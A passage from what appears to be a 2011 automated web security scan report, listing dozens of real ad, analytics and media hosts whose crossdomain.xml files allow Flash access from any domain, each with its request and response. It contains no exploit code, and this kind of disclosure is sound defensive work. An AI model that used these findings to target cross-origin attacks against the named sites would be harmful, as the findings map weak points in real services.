<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.34. http://l.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://l.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
ETag: "4ded34bc=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Mon, 06 Jun 2011 20:12:44 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

4.35. http://load.tubemogul.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://load.tubemogul.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315229954000"
Last-Modified: Mon, 05 Sep 2011 13:39:14 GMT
host: rcv-srv33
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.36. http://log30.doubleverify.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://log30.doubleverify.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:53 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://netsuite.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: netsuite.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 15:32:28 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.38. http://network.realmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "18d11d-d0-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 15:35:10 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.39. http://now.eloqua.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:12 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.40. http://oimg.m.cnbc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oimg.m.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:49 GMT
Server: Omniture DC/2.0.0
xserver: www282
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.41. http://oimg.nbcuni.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oimg.nbcuni.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www78
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.42. http://omni.csc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://omni.csc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www614
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.43. http://oracle.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oracle.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:06 GMT
Server: Omniture DC/2.0.0
xserver: www423
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.44. http://oracleglobal.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www93
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www431
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.46. http://p.brilig.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:19:04 GMT
ETag: "55fb9-ab-4a861e6c7f200"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=74
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>

4.47. http://pg.links.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pg.links.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2faa"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Tue, 06 Sep 2011 16:45:35 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pg.links.origin.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
Accept-Ranges: bytes
ETag: "eb20ee82e722c81:2884"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.49. http://ping.crowdscience.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Wed, 27 Apr 2011 03:48:25 GMT
ETag: "c3167-e0-4a1de5011d440"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>

...[SNIP]...

4.50. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.51. http://pixel.adsafeprotected.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.52. http://pixel.everesttech.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051143-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=999077
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.53. http://pixel.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.54. http://pixel.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3a 32570
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.55. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.56. http://pro.cnbc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pro.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pro.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:07 GMT
Via: 1.1 C aicache6
Content-Length: 203
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 15:03:20 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.57. http://r.casalemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rcv-srv03.inplay.tubemogul.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv03.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.59. http://receive.inplay.tubemogul.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://receive.inplay.tubemogul.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.60. http://reviews.gillettevenus.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://reviews.gillettevenus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: reviews.gillettevenus.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

4.61. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 23:18:10 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 56400
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.62. http://search.twitter.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:53 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:42:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.63. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.64. http://services.plymedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://services.plymedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: services.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15552000
Content-Length: 682
Content-Type: text/xml
Content-Location: http://services.plymedia.com/crossdomain.xml
Last-Modified: Sun, 12 Oct 2008 12:01:36 GMT
Accept-Ranges: bytes
ETag: "d4bdbe46622cc91:69f"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 16:12:57 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.65. http://speed.pointroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.66. http://static.plymedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.plymedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: p2kfOzDCng+L76/JTsga//ruR9goW2HSjGFLQ4hzapeI1gDCQ+kmiJpTbuF2/Np4
x-amz-request-id: E50262CF927C8E0A
Date: Tue, 12 Jul 2011 23:33:42 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3
Age: 2242
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 123b0430d85da58b68cb675acbdd06c268df8e8fd9fca78a071b7f61da95f240a1e6cf1947de972d
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 146c5c89c7c8fdf6aead7052bd267a9d.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.plymedia.com.s3.amazonaws.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: Pd0L2ovjrp/ISSNethDM0f3pSYm1BIX6qTq2TTDXHH+SL+bp1gPlnN6PYv/OGA5v
x-amz-request-id: C468540F9D630C4D
Date: Tue, 06 Sep 2011 16:13:11 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.68. http://stats.deloitte.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stats.deloitte.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:01 GMT
Server: Omniture DC/2.0.0
xserver: www88
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.69. http://statse.webtrendslive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
